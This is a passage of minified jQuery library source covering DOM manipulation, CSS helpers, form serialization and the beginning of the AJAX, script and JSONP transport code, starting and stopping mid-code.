at.test(e)||(r=n),r&&"string"==typeof r&&(i=b.filter(r,i)),i=this.length>1&&!ct[e]?b.unique(i):i,this.length>1&&st.test(e)&&(i=i.reverse()),this.pushStack(i)}}),b.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),1===t.length?b.find.matchesSelector(t[0],e)?[t[0]]:[]:b.find.matches(e,t)},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!b(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(t=t||0,b.isFunction(t))return b.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return b.grep(e,function(e){return e===t===n});if("string"==typeof t){var r=b.grep(e,function(e){return 1===e.nodeType});if(ut.test(t))return b.filter(t,r,!n);t=b.filter(t,r)}return b.grep(e,function(e){return b.inArray(e,t)>=0===n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/<tbody/i,wt=/<|&#?\w+;/,Tt=/<(?:script|style|link)/i,Nt=/^(?:checkbox|radio)$/i,Ct=/checked\s*(?:[^=]|=\s*.checked.)/i,kt=/^$|\/(?:java|ecma)script/i,Et=/^true\/(.*)/,St=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,At={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:b.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},jt=dt(o),Dt=jt.appendChild(o.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,b.fn.extend({text:function(e){return b.access(this,function(e){return e===t?b.text(this):this.empty().append((this[0]&&this[0].ownerDocument||o).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(b.isFunction(e))return this.each(function(t){b(this).wrapAll(e.call(this,t))});if(this[0]){var t=b(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return b.isFunction(e)?this.each(function(t){b(this).wrapInner(e.call(this,t))}):this.each(function(){var t=b(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=b.isFunction(e);return this.each(function(n){b(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){b.nodeName(this,"body")||b(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&this.insertBefore(e,this.firstChild)})},before:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=0;for(;null!=(n=this[r]);r++)(!e||b.filter(e,[n]).length>0)&&(t||1!==n.nodeType||b.cleanData(Ot(n)),n.parentNode&&(t&&b.contains(n.ownerDocument,n)&&Mt(Ot(n,"script")),n.parentNode.removeChild(n)));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&b.cleanData(Ot(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&b.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return b.clone(this,e,t)})},html:function(e){return b.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!b.support.htmlSerialize&&mt.test(e)||!b.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1></$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(b.cleanData(Ot(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){var t=b.isFunction(e);return t||"string"==typeof e||(e=b(e).not(this).detach()),this.domManip([e],!0,function(e){var t=this.nextSibling,n=this.parentNode;n&&(b(this).remove(),n.insertBefore(e,t))})},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=f.apply([],e);var i,o,a,s,u,l,c=0,p=this.length,d=this,h=p-1,g=e[0],m=b.isFunction(g);if(m||!(1>=p||"string"!=typeof g||b.support.checkClone)&&Ct.test(g))return this.each(function(i){var o=d.eq(i);m&&(e[0]=g.call(this,i,n?o.html():t)),o.domManip(e,n,r)});if(p&&(l=b.buildFragment(e,this[0].ownerDocument,!1,this),i=l.firstChild,1===l.childNodes.length&&(l=i),i)){for(n=n&&b.nodeName(i,"tr"),s=b.map(Ot(l,"script"),Ht),a=s.length;p>c;c++)o=l,c!==h&&(o=b.clone(o,!0,!0),a&&b.merge(s,Ot(o,"script"))),r.call(n&&b.nodeName(this[c],"table")?Lt(this[c],"tbody"):this[c],o,c);if(a)for(u=s[s.length-1].ownerDocument,b.map(s,qt),c=0;a>c;c++)o=s[c],kt.test(o.type||"")&&!b._data(o,"globalEval")&&b.contains(u,o)&&(o.src?b.ajax({url:o.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):b.globalEval((o.text||o.textContent||o.innerHTML||"").replace(St,"")));l=i=null}return this}});function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function Ht(e){var t=e.getAttributeNode("type");return e.type=(t&&t.specified)+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function Mt(e,t){var n,r=0;for(;null!=(n=e[r]);r++)b._data(n,"globalEval",!t||b._data(t[r],"globalEval"))}function _t(e,t){if(1===t.nodeType&&b.hasData(e)){var n,r,i,o=b._data(e),a=b._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)b.event.add(t,n,s[n][r])}a.data&&(a.data=b.extend({},a.data))}}function Ft(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!b.support.noCloneEvent&&t[b.expando]){i=b._data(t);for(r in i.events)b.removeEvent(t,r,i.handle);t.removeAttribute(b.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),b.support.html5Clone&&e.innerHTML&&!b.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Nt.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}b.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){b.fn[e]=function(e){var n,r=0,i=[],o=b(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),b(o[r])[t](n),d.apply(i,n.get());return this.pushStack(i)}});function Ot(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||b.nodeName(o,n)?s.push(o):b.merge(s,Ot(o,n));return n===t||n&&b.nodeName(e,n)?b.merge([e],s):s}function Bt(e){Nt.test(e.type)&&(e.defaultChecked=e.checked)}b.extend({clone:function(e,t,n){var r,i,o,a,s,u=b.contains(e.ownerDocument,e);if(b.support.html5Clone||b.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(b.support.noCloneEvent&&b.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||b.isXMLDoc(e)))for(r=Ot(o),s=Ot(e),a=0;null!=(i=s[a]);++a)r[a]&&Ft(i,r[a]);if(t)if(n)for(s=s||Ot(e),r=r||Ot(o),a=0;null!=(i=s[a]);a++)_t(i,r[a]);else _t(e,o);return r=Ot(o,"script"),r.length>0&&Mt(r,!u&&Ot(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,u,l,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===b.type(o))b.merge(d,o.nodeType?[o]:o);else if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),u=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[u]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1></$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!b.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!b.support.tbody){o="table"!==u||xt.test(o)?"<table>"!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)b.nodeName(l=o.childNodes[i],"tbody")&&!l.childNodes.length&&o.removeChild(l)
	}b.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),b.support.appendChecked||b.grep(Ot(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===b.inArray(o,r))&&(a=b.contains(o.ownerDocument,o),s=Ot(f.appendChild(o),"script"),a&&Mt(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,u=b.expando,l=b.cache,p=b.support.deleteExpando,f=b.event.special;for(;null!=(n=e[s]);s++)if((t||b.acceptData(n))&&(o=n[u],a=o&&l[o])){if(a.events)for(r in a.events)f[r]?b.event.remove(n,r):b.removeEvent(n,r,a.handle);l[o]&&(delete l[o],p?delete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*)$","i"),Yt=RegExp("^("+x+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+x+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===b.css(e,"display")||!b.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=b._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=b._data(r,"olddisplay",un(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&b._data(r,"olddisplay",i?n:b.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}b.fn.extend({css:function(e,n){return b.access(this,function(e,n,r){var i,o,a={},s=0;if(b.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=b.css(e,n[s],!1,o);return a}return r!==t?b.style(e,n,r):b.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){var t="boolean"==typeof e;return this.each(function(){(t?e:nn(this))?b(this).show():b(this).hide()})}}),b.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":b.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,u=b.camelCase(n),l=e.style;if(n=b.cssProps[u]||(b.cssProps[u]=tn(l,u)),s=b.cssHooks[n]||b.cssHooks[u],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:l[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(b.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||b.cssNumber[u]||(r+="px"),b.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(l[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{l[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,u=b.camelCase(n);return n=b.cssProps[u]||(b.cssProps[u]=tn(e.style,u)),s=b.cssHooks[n]||b.cssHooks[u],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||b.isNumeric(o)?o||0:a):a},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),u=s?s.getPropertyValue(n)||s[n]:t,l=e.style;return s&&(""!==u||b.contains(e.ownerDocument,e)||(u=b.style(e,n)),Yt.test(u)&&Ut.test(n)&&(i=l.width,o=l.minWidth,a=l.maxWidth,l.minWidth=l.maxWidth=l.width=u,u=s.width,l.width=i,l.minWidth=o,l.maxWidth=a)),u}):o.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),u=s?s[n]:t,l=e.style;return null==u&&l&&l[n]&&(u=l[n]),Yt.test(u)&&!zt.test(n)&&(i=l.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),l.left="fontSize"===n?"1em":u,u=l.pixelLeft+"px",l.left=i,a&&(o.left=a)),""===u?"auto":u});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=b.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=b.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=b.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=b.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=b.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=b.support.boxSizing&&"border-box"===b.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(b.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function un(e){var t=o,n=Gt[e];return n||(n=ln(e,t),"none"!==n&&n||(Pt=(Pt||b("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(Pt[0].contentWindow||Pt[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=ln(e,t),Pt.detach()),Gt[e]=n),n}function ln(e,t){var n=b(t.createElement(e)).appendTo(t.body),r=b.css(n[0],"display");return n.remove(),r}b.each(["height","width"],function(e,n){b.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&Xt.test(b.css(e,"display"))?b.swap(e,Qt,function(){return sn(e,n,i)}):sn(e,n,i):t},set:function(e,t,r){var i=r&&Rt(e);return on(e,t,r?an(e,n,r,b.support.boxSizing&&"border-box"===b.css(e,"boxSizing",!1,i),i):0)}}}),b.support.opacity||(b.cssHooks.opacity={get:function(e,t){return It.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=b.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===b.trim(o.replace($t,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=$t.test(o)?o.replace($t,i):o+" "+i)}}),b(function(){b.support.reliableMarginRight||(b.cssHooks.marginRight={get:function(e,n){return n?b.swap(e,{display:"inline-block"},Wt,[e,"marginRight"]):t}}),!b.support.pixelPosition&&b.fn.position&&b.each(["top","left"],function(e,n){b.cssHooks[n]={get:function(e,r){return r?(r=Wt(e,n),Yt.test(r)?b(e).position()[n]+"px":r):t}}})}),b.expr&&b.expr.filters&&(b.expr.filters.hidden=function(e){return 0>=e.offsetWidth&&0>=e.offsetHeight||!b.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||b.css(e,"display"))},b.expr.filters.visible=function(e){return!b.expr.filters.hidden(e)}),b.each({margin:"",padding:"",border:"Width"},function(e,t){b.cssHooks[e+t]={expand:function(n){var r=0,i={},o="string"==typeof n?n.split(" "):[n];for(;4>r;r++)i[e+Zt[r]+t]=o[r]||o[r-2]||o[0];return i}},Ut.test(e)||(b.cssHooks[e+t].set=on)});var cn=/%20/g,pn=/\[\]$/,fn=/\r?\n/g,dn=/^(?:submit|button|image|reset|file)$/i,hn=/^(?:input|select|textarea|keygen)/i;b.fn.extend({serialize:function(){return b.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=b.prop(this,"elements");return e?b.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!b(this).is(":disabled")&&hn.test(this.nodeName)&&!dn.test(e)&&(this.checked||!Nt.test(e))}).map(function(e,t){var n=b(this).val();return null==n?null:b.isArray(n)?b.map(n,function(e){return{name:t.name,value:e.replace(fn,"\r\n")}}):{name:t.name,value:n.replace(fn,"\r\n")}}).get()}}),b.param=function(e,n){var r,i=[],o=function(e,t){t=b.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(n===t&&(n=b.ajaxSettings&&b.ajaxSettings.traditional),b.isArray(e)||e.jquery&&!b.isPlainObject(e))b.each(e,function(){o(this.name,this.value)});else for(r in e)gn(r,e[r],n,o);return i.join("&").replace(cn,"+")};function gn(e,t,n,r){var i;if(b.isArray(t))b.each(t,function(t,i){n||pn.test(e)?r(e,i):gn(e+"["+("object"==typeof i?t:"")+"]",i,n,r)});else if(n||"object"!==b.type(t))r(e,t);else for(i in t)gn(e+"["+i+"]",t[i],n,r)}b.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){b.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),b.fn.hover=function(e,t){return this.mouseenter(e).mouseleave(t||e)};var mn,yn,vn=b.now(),bn=/\?/,xn=/#.*$/,wn=/([?&])_=[^&]*/,Tn=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Nn=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Cn=/^(?:GET|HEAD)$/,kn=/^\/\//,En=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Sn=b.fn.load,An={},jn={},Dn="*/".concat("*");try{yn=a.href}catch(Ln){yn=o.createElement("a"),yn.href="",yn=yn.href}mn=En.exec(yn.toLowerCase())||[];function Hn(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(w)||[];if(b.isFunction(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function qn(e,n,r,i){var o={},a=e===jn;function s(u){var l;return o[u]=!0,b.each(e[u]||[],function(e,u){var c=u(n,r,i);return"string"!=typeof c||a||o[c]?a?!(l=c):t:(n.dataTypes.unshift(c),s(c),!1)}),l}return s(n.dataTypes[0])||!o["*"]&&s("*")}function Mn(e,n){var r,i,o=b.ajaxSettings.flatOptions||{};for(i in n)n[i]!==t&&((o[i]?e:r||(r={}))[i]=n[i]);return r&&b.extend(!0,e,r),e}b.fn.load=function(e,n,r){if("string"!=typeof e&&Sn)return Sn.apply(this,arguments);var i,o,a,s=this,u=e.indexOf(" ");return u>=0&&(i=e.slice(u,e.length),e=e.slice(0,u)),b.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(a="POST"),s.length>0&&b.ajax({url:e,type:a,dataType:"html",data:n}).done(function(e){o=arguments,s.html(i?b("<div>").append(b.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,o||[e.responseText,t,e])}),this},b.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){b.fn[t]=function(e){return this.on(t,e)}}),b.each(["get","post"],function(e,n){b[n]=function(e,r,i,o){return b.isFunction(r)&&(o=o||i,i=r,r=t),b.ajax({url:e,type:n,dataType:o,data:r,success:i})}}),b.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:yn,type:"GET",isLocal:Nn.test(mn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Dn,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":b.parseJSON,"text xml":b.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?Mn(Mn(e,b.ajaxSettings),t):Mn(b.ajaxSettings,e)},ajaxPrefilter:Hn(An),ajaxTransport:Hn(jn),ajax:function(e,n){"object"==typeof e&&(n=e,e=t),n=n||{};var r,i,o,a,s,u,l,c,p=b.ajaxSetup({},n),f=p.context||p,d=p.context&&(f.nodeType||f.jquery)?b(f):b.event,h=b.Deferred(),g=b.Callbacks("once memory"),m=p.statusCode||{},y={},v={},x=0,T="canceled",N={readyState:0,getResponseHeader:function(e){var t;if(2===x){if(!c){c={};while(t=Tn.exec(a))c[t[1].toLowerCase()]=t[2]}t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===x?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return x||(e=v[n]=v[n]||e,y[e]=t),this},overrideMimeType:function(e){return x||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>x)for(t in e)m[t]=[m[t],e[t]];else N.always(e[N.status]);return this},abort:function(e){var t=e||T;return l&&l.abort(t),k(0,t),this}};if(h.promise(N).complete=g.add,N.success=N.done,N.error=N.fail,p.url=((e||p.url||yn)+"").replace(xn,"").replace(kn,mn[1]+"//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=b.trim(p.dataType||"*").toLowerCase().match(w)||[""],null==p.crossDomain&&(r=En.exec(p.url.toLowerCase()),p.crossDomain=!(!r||r[1]===mn[1]&&r[2]===mn[2]&&(r[3]||("http:"===r[1]?80:443))==(mn[3]||("http:"===mn[1]?80:443)))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=b.param(p.data,p.traditional)),qn(An,p,n,N),2===x)return N;u=p.global,u&&0===b.active++&&b.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!Cn.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url+=(bn.test(o)?"&":"?")+p.data,delete p.data),p.cache===!1&&(p.url=wn.test(o)?o.replace(wn,"$1_="+vn++):o+(bn.test(o)?"&":"?")+"_="+vn++)),p.ifModified&&(b.lastModified[o]&&N.setRequestHeader("If-Modified-Since",b.lastModified[o]),b.etag[o]&&N.setRequestHeader("If-None-Match",b.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&N.setRequestHeader("Content-Type",p.contentType),N.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]]+("*"!==p.dataTypes[0]?", "+Dn+"; q=0.01":""):p.accepts["*"]);for(i in p.headers)N.setRequestHeader(i,p.headers[i]);if(p.beforeSend&&(p.beforeSend.call(f,N,p)===!1||2===x))return N.abort();T="abort";for(i in{success:1,error:1,complete:1})N[i](p[i]);if(l=qn(jn,p,n,N)){N.readyState=1,u&&d.trigger("ajaxSend",[N,p]),p.async&&p.timeout>0&&(s=setTimeout(function(){N.abort("timeout")},p.timeout));try{x=1,l.send(y,k)}catch(C){if(!(2>x))throw C;k(-1,C)}}else k(-1,"No Transport");function k(e,n,r,i){var c,y,v,w,T,C=n;2!==x&&(x=2,s&&clearTimeout(s),l=t,a=i||"",N.readyState=e>0?4:0,r&&(w=_n(p,N,r)),e>=200&&300>e||304===e?(p.ifModified&&(T=N.getResponseHeader("Last-Modified"),T&&(b.lastModified[o]=T),T=N.getResponseHeader("etag"),T&&(b.etag[o]=T)),204===e?(c=!0,C="nocontent"):304===e?(c=!0,C="notmodified"):(c=Fn(p,w),C=c.state,y=c.data,v=c.error,c=!v)):(v=C,(e||!C)&&(C="error",0>e&&(e=0))),N.status=e,N.statusText=(n||C)+"",c?h.resolveWith(f,[y,C,N]):h.rejectWith(f,[N,C,v]),N.statusCode(m),m=t,u&&d.trigger(c?"ajaxSuccess":"ajaxError",[N,p,c?y:v]),g.fireWith(f,[N,C]),u&&(d.trigger("ajaxComplete",[N,p]),--b.active||b.event.trigger("ajaxStop")))}return N},getScript:function(e,n){return b.get(e,t,n,"script")},getJSON:function(e,t,n){return b.get(e,t,n,"json")}});function _n(e,n,r){var i,o,a,s,u=e.contents,l=e.dataTypes,c=e.responseFields;for(s in c)s in r&&(n[c[s]]=r[s]);while("*"===l[0])l.shift(),o===t&&(o=e.mimeType||n.getResponseHeader("Content-Type"));if(o)for(s in u)if(u[s]&&u[s].test(o)){l.unshift(s);break}if(l[0]in r)a=l[0];else{for(s in r){if(!l[0]||e.converters[s+" "+l[0]]){a=s;break}i||(i=s)}a=a||i}return a?(a!==l[0]&&l.unshift(a),r[a]):t}function Fn(e,t){var n,r,i,o,a={},s=0,u=e.dataTypes.slice(),l=u[0];if(e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u[1])for(i in e.converters)a[i.toLowerCase()]=e.converters[i];for(;r=u[++s];)if("*"!==r){if("*"!==l&&l!==r){if(i=a[l+" "+r]||a["* "+r],!i)for(n in a)if(o=n.split(" "),o[1]===r&&(i=a[l+" "+o[0]]||a["* "+o[0]])){i===!0?i=a[n]:a[n]!==!0&&(r=o[0],u.splice(s--,0,r));break}if(i!==!0)if(i&&e["throws"])t=i(t);else try{t=i(t)}catch(c){return{state:"parsererror",error:i?c:"No conversion from "+l+" to "+r}}}l=r}return{state:"success",data:t}}b.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return b.globalEval(e),e}}}),b.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),b.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=o.head||b("head")[0]||o.documentElement;return{send:function(t,i){n=o.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var On=[],Bn=/(=)\?(?=&|$)|\?\?/;b.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=On.pop()||b.expando+"_"+vn++;return this[e]=!0,e}}),b.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,u=n.jsonp!==!1&&(Bn.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");return u||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=b.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,u?n[u]=n[u].replace(Bn,"$1"+o):n.jsonp!==!1&&(n.url+=(bn.test(n.url)?"&":"?")+n.jsonp+"="+o),n.converters["script json"]=function(){return s||b.error(o+" was not 